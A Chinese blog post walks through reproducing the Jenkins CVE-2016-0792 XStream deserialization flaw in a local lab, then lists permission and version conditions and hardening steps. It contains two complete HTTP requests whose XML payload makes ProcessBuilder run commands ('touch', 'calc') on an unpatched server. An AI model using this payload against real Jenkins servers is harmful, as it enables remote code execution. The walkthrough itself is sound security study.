Jenkins cve-2016-0792 漏洞复现 Xstream 反序列化漏洞

最新推荐文章于 2023-11-27 09:26:58 发布
最新推荐文章于 2023-11-27 09:26:58 发布
阅读量1k 收藏
点赞数 1
原文链接:https://blog.csdn.net/whatday/article/details/107449168
版权

环境搭建

首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析
下载链接 

http://archives.jenkins-ci.org/war-stable/1.642.1/jenkins.war

这里需要在本地配置java环境,具体方法这里不在介绍,我复现使用的是java8

java -jar jenkins.war --httpPort=8080

httpport可以自定义之后访问 http://127.0.0.1:8080/

可以打开即为搭建成功
在这里插入图片描述

漏洞复现

使用burp发送数据包

POST /createItem?name=foo HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.135:8080/newJob
Cookie: JSESSIONID.51669330=2ma9elc96wwk16e4k07sq0ri9; screenResolution=1440x900
Connection: keep-alive
Content-Type: text/xml
Content-Length: 889

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="java.lang.ProcessBuilder">
              <command>
                <string>touch</string>
        <string>/home/angelwhu/tmp/pwned</string>
              </command>
              <redirectErrorStream>false</redirectErrorStream>
            </delegate>
            <owner class="java.lang.ProcessBuilder" reference="../delegate"/>
            <resolveStrategy>0</resolveStrategy>
            <directive>0</directive>
            <parameterTypes/>
            <maximumNumberOfParameters>0</maximumNumberOfParameters>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>123</int>
  </entry>
</map>

因为这里是使用本地的windows,所以修改一下command中间的参数

POST /createItem?name=foo HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.135:8080/newJob
Cookie: JSESSIONID.51669330=2ma9elc96wwk16e4k07sq0ri9; screenResolution=1440x900
Connection: keep-alive
Content-Type: text/xml
Content-Length: 889

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="java.lang.ProcessBuilder">
              <command>
                <string>calc</string>
              </command>
              <redirectErrorStream>false</redirectErrorStream>
            </delegate>
            <owner class="java.lang.ProcessBuilder" reference="../delegate"/>
            <resolveStrategy>0</resolveStrategy>
            <directive>0</directive>
            <parameterTypes/>
            <maximumNumberOfParameters>0</maximumNumberOfParameters>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>123</int>
  </entry>
</map>

成功弹出计算器
在这里插入图片描述

环境清理

使用命令java -jar jenkins.war --httpPort=8080后会自动在用户目录下创建一个.jenkins文件夹,大约占用c盘100m左右的空间,

在这里插入图片描述

在使用完后可以对其进行删除之后清理回收站

利用总结

1. 权限限制条件:

无论匿名用户,还是登陆用户,权限必须具有“Overall的read权限和Job的create权限”两个权限(当然具有其他权限越多越好,若拥有administrater权限,其他任何权限都不是必须条件了,因为administrater为最高权限,故这里不考虑administrater)。因为该个漏洞是利用的createitem创建job的功能去调用api,所以create是必须的,而Jenkins最基本的权限是overall的read权限,用户必须赋予阅读的权限,不然什么都看不到。

2. 版本限制条件:

jenkins版本小于 1.650 (1.650版本已修复该问题)

3. post数据内容类型:

构造一个恶意的 XML 文档发送至服务端接口时,内容类型需注意为xml。

安全加固

l 更新 Jenkins 至最新版本 1.650以上。

l jenkins做访问控制,收入内网不开放往外网。

l 禁止jenkins的匿名访问权限。

l 保证每个jenkins账号不为弱口令。

 

 

whatday
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jenkins反序列化漏洞复现
谢公子的博客
10-11 2047
Jenkins Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。 Jenkins功能包括: 持续的软件版本发布/测试项目。 监控外部调用执行的工作。 Jenkins曾经发生的反序列化漏洞CVE-2015-8103 CVE-2016-9299 CVE-2017-1000353 ...
Jenkins-CVE-2016-0792漏洞复现Xstream 反序列化漏洞
whojoe的博客
06-04 4795
Jenkins-CVE-2016-0792漏洞复现Xstream 反序列化漏洞)环境搭建漏洞复现环境清理参考文章 环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 下载链接 http://archives.jenkins-ci.org/war-stable/1.642.1/jenkins.war 这里需要在本地配置java环境,具体方法这里不在介绍,我复现
漏洞复现Jenkins反序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_45556536的博客
11-17 756
Jenkins反序列化漏洞利用CVE-2017-1000353基础知识漏洞原理影响版本复现思路复现CVE-2018-10008611、特征检测 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。   形成漏洞的根源在于类ObjectInputStream在反序列
RCE via XStream object deserialization && SECURITY-247 / CVE-2016-0792 XML reconstruction Object Cod...
weixin_33834137的博客
02-26 203
catalogue 1. Java xStream 2. DynamicProxyConverter 3. java.beans.EventHandler 4. RCE via XStream object deserialization 5. Standard way to serialize and deserialize Objects with XStream 6. SE...
XStream 高危漏洞合集,XStream 组件反序列化漏洞
最新发布
weixin_45314962的博客
11-27 2342
CVE-2021-29505反序列化代码执行漏洞
[漏洞复现]vulfocus/jenkins-cve_2017_1000353
qq_45751902的博客
11-24 561
Jenkins反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限建议自己搭建环境复现,这个vulfocus上没有体现出反序列化漏洞,因为无法使用反序列化查看flag,最终使用弱口令登录,执行系统命令成功找到flag。
XStream反序列化漏洞分析
weixin_44825990的博客
11-25 1859
XStream反序列化漏洞分析
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437) 复现
yukinorong的博客
06-29 3252
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞反序列化的检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
XStream 反序列化漏洞 (CVE-2020-26258 & 26259) 的复现与分析
smellycat000的专栏
12-16 3709
聚焦源代码安全,网罗国内外最新资讯!Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可...
Jenkins RCE 漏洞CVE-2019-1003000) 复现
玄道的网安博客
09-24 3486
影响版本 Pipeline: Declarative Plugin up to and including 1.3.4 Pipeline: Groovy Plugin up to and including 2.61 Script Security Plugin up to and including 1.49 环境搭建 复现漏洞CVE-2019-1003000 (Script Security) 测试环境需要安装docker git clone https://github.com.
xstream_1.4.11.1.jar
04-17
xstream_1.4.11.1.jar 是list转化为xml必须的jar包,通过下载导入可以正常使用
xstream相关的jar包
03-04
xstream所需要的jar包,xstream-1.4.9.jar、dom4j-1.6.1.jar、xpp3_min-1.1.4c.jar等
Jenkins-CVE-2016-0792漏洞利用及修复建议
angaoux03775的博客
02-28 311
漏洞概述: 国外网站ContrastSecurity于2016年2月24日在公开了Jenkins近日修复的一个可通过低权限用户调用API服务致使的命令执行漏洞详情。通过低权限用户构造一个恶意的XML文档发送至服务端接口,使服务端解析时调用API执行外部命令。 利用方法: 1.登陆低权限用户test 权限为:Overall的read权限+Job的cr...
XStream 反序列化命令执行漏洞CVE-2021-21351)
EC_Carrot的博客
08-21 1157
漏洞简介 XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。 漏洞复现 由于目标环境Java版本高于8u191,所以我们需要使用org.apache.naming.
【组件攻击链】XStream组件高危漏洞分析与利用
further_eye的博客
12-01 2888
XStream组件漏洞主要是java反序列化造成的远程代码执行漏洞,目前官方通过黑名单的方式对java反序列化攻击进行防御,由于黑名单防御机制存在被绕过的风险,因此以后可能会出现类似java反序列化漏洞
漏洞复现-Xstream(CVE-2021-29505)
aming小老弟
06-01 1971
Xstream
jenkins漏洞集合
SHELLCODE_8BIT的博客
03-01 4655
复现文章和脚本大都是网上收集,大部分能找到出处的,个别找不到明确的地址。
Java反序列化漏洞及实例详解
ran的博客
04-15 4049
在这里我们将其原有的代码数据更改成了一个访问http的代码数据,当对方在进行反序列化的时候,就会将我们更改后的代码数据进行执行,就会对http进行访问。5.至此,我们可以想到,如果将反序列化的目标文件的内容进行修改,修改成具有攻击性的代码,那么就可以实现一定的攻击性行为。2.执行序列化部分的代码,可以看到在指定路径下生成了指定的文件,文件内包含序列化的内容。执行反序列化部分的代码,可以看到其反序列化成功,并且将原始的内容进行了返回。6.来到目标路径下可以看到生成的文件,以及文件内的序列化内容。
Jenkins 插件错误,Jenkins无法启动
zcl369369的专栏
08-14 6846
Jenkins 插件错误,导致jenkins启动不了。 解决办法: 进入jenkins配置文件目录 cd /Users/用户名/.jenkins 之后打开config.xml文件,找到该插件的配置,并删除。 重启jenkins,搞定。 参考: https://issues.jenkins-ci.org/browse/JENKINS-54299?page=com.atlassian.jira.plu...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值